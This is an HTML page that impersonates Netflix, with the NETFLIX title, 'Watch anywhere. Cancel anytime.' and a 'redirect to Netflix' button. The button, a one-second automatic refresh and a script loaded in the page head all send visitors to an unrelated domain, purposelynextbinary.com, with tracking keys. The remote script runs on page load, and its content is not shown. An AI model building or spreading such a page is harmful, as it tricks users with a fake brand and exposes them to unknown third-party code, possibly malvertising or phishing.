<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>NETFLIX</title>
  <meta property="og:image" content="https://i.imgur.com/5vxni4X.jpg">
  <meta property="og:title" content="Website Redirection">
  <meta property="og:description" content="Netflix">
  <meta property="og:type" content="website">
  <meta http-equiv="refresh" content="1;url=https://purposelynextbinary.com/n8x376ntqs?key=a316e3e44261e689af0b081477056693">
  <meta property="og:url" content="https://purposelynextbinary.com/n8x376ntqs?key=a316e3e44261e689af0b081477056693">
  <meta property="og:type" content="website">
  <style>
    body {
      background-color: white;
      color: red;
      font-family: 'Montserrat', sans-serif;
      font-weight: 50000;
      text-align: center;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
    }
    .redirect-button {
      margin-top: 20px;
      padding: 10px 20px;
      background-color: red;
      color: white;
      border: none;
      cursor: pointer;
    }
  </style>
  <script type='text/javascript' src='//purposelynextbinary.com/04/d8/75/04d8752c6c98ba502060a249047b6a2d.js'></script>
</head>
<body>
  <h1>NETFLIX</h1>
  <p>Watch anywhere. Cancel anytime.</p>
  <button class="redirect-button" onclick="redirectToNetflix()">Please Click Here to redirect to Netflix</button>
  <script>
    function redirectToNetflix() {
      window.location.href = "https://purposelynextbinary.com/z87838rh?key=e1e3a05ea63a7878ef2f6522f82c084b";
    }
  </script>
</body>
</html>
